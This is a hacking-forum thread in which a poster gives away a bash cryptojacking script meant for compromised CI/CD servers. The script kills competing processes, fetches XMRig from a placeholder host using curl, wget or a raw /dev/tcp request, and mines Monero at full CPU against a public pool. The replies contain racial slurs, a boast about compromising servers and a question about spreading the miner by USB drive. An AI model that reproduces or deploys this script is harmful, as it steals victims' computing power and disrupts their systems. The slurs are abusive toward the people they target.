CI/CD - XMR Mining Malware
by IntelBroker - Saturday December 30, 2023 at 05:37 PM
#1
Hello BF.
I've had this for a long time and think that giving it away for free is a good idea, especially as we are coming up to the new year.
Deploy this on CI/CD servers, either on an executed shell or CLI.
Documentation is within the code.
It's a XMR miner (with XMR-RIG) for stealthy mining on compromised CI/CD servers.
#!/bin/bash ps aux | grep -v grep | grep -v "java\|redis\|weblogic\|mongod\|mysql\|oracle\|b52e75408\|tomcat\|grep\|postgres\|confluence\|awk\|aux\|sh"| awk "{if($3>60.0) print $2}" | xargs -I % kill -9 % if [[ $(whoami) != "root" ]]; then     for tr in $(ps -U $(whoami) | egrep -v "java|ps|sh|egrep|grep|PID" | cut -b1-6); do         kill -9 $tr || : ;     done; fi threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1); hostHash=$(hostname -f | md5sum | cut -c1-8); echo "${hostHash} - ${threadCount}"; _curl () {   read proto server path <<<$(echo ${1//// })   DOC=/${path// //}   HOST=${server//:*}   PORT=${server//*:}   [[ x"${HOST}" == x"${PORT}" ]] && PORT=80   exec 3<>/dev/tcp/${HOST}/$PORT   echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3   (while read line; do   [[ "$line" == $'\r' ]] && break   done && cat) <&3   exec 3>&- } rm -rf config.json; d () {       curl -L --insecure --connect-timeout 5 --max-time 40 --fail $1 -o $2 2> /dev/null || wget --no-check-certificate --timeout 40 --tries 1 $1 -O $2 2> /dev/null || _curl $1 > $2; } test ! -s trace && \     d http://URL_THAT_HOSTS_XMRRIG_TAR/xmrig-6.4.0-linux-x64.tar.gz trace.tgz && \     tar -zxvf trace.tgz && \     mv xmrig-6.4.0/xmrig trace && \     rm -rf xmrig-6.4.0 && \     rm -rf trace.tgz; test ! -x trace && chmod +x trace; k() {     ./trace \         -r 2 \         -R 2 \         --keepalive \         --no-color \         --donate-level 1 \         --max-cpu-usage 100 \         --cpu-priority 3 \         --print-time 25 \         --threads ${threadCount:-4} \         --url $1 \         --user XMR_WALLET_ADDRESS \         --pass elf2 \         --keepalive } k auto.c3pool.org:13333
Ban reason: Legend (Permanent)
Reply
#2
good shit <3
Ban reason: Scamming | https://doxbin.com/upload/0x27Doxxed | https://ibb.co/nqtc4prn (Permanent)
Reply
#3
am niggering almost every chinese server
Ban reason: Self-Ban | https://raidforums.su/Forum-Ban-Appeals if you wish to be unbanned in the future. (Permanent)
Reply
#4
Thanks nigger! #niggered
My telegram got banned! contact me via PM


xmpp (Jabber): 303@thesecure.biz
Reply
#5
can this be configured so it can be deployed on machine using a usb drive or something similar
Reply
#6
Impressive post!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Malware Extension Spoofer Psych1c 21 518 06-25-2026, 01:37 AM
Last Post: yvngrich
  Rust Malware PDF builder (Open SRC) L_DWORD 105 14,175 03-27-2026, 08:28 AM
Last Post: sergiojames
  Malware On Steroids Carpenter12 0 19 02-10-2026, 07:06 PM
Last Post: Carpenter12
  AI-Driven Malware Boat 151 9,534 02-09-2026, 04:30 AM
Last Post: sergiojames
  Sektor7 - Malware Development Advanced - Vol.1 Sh4d0w1X 418 40,716 02-09-2026, 04:18 AM
Last Post: sergiojames



 Users browsing this thread: